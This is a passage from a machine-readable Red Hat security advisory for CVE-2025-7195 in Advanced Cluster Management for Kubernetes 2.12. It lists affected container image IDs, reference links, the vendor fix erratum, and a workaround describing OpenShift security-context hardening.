"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-7195"
},
{
"category": "external",
"summary": "RHBZ#2376300",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2376300"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-7195",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-7195"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-7195",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7195"
}
],
"release_date": "2025-08-07T18:59:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T14:07:27+00:00",
"details": "Before you apply this update, make sure all previously released errata\nthat are relevant to your system are applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5633"
},
{
"category": "workaround",
"details": "In Red Hat OpenShift Container Platform, the following default configurations reduce the impact of this vulnerability.\n\nSecurity Context Constraints (SCCs): The default SCC, Restricted-v2, applies several crucial security settings to containers. \n\nCapabilities: drop: ALL removes all Linux capabilities, including SETUID and SETGID. This prevents a process from changing its user or group ID, a common step in privilege escalation attacks. The SETUID and SETGID capabilities can also be dropped explicitly if other capabilities are still required.\n\nallowPrivilegeEscalation: false ensures that a process cannot gain more privileges than its parent process. This blocks attempts by a compromised container process to grant itself additional capabilities.\n\nSELinux Mandatory Access Control (MAC): Pods are required to run with a pre-allocated Multi-Category Security (MCS) label. This SELinux feature provides a strong layer of isolation between containers and from the host system. A properly configured SELinux policy can prevent a container escape, even if an attacker gains elevated permissions within the container itself.\n\nFilesystem Hardening: While not a default setting, a common security practice is to set readOnlyRootFilesystem: true in a container\u0027s security context. In this specific scenario, this configuration would prevent an attacker from modifying critical files like /etc/passwd, even if they managed to gain file-level write permissions.",
"product_ids": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
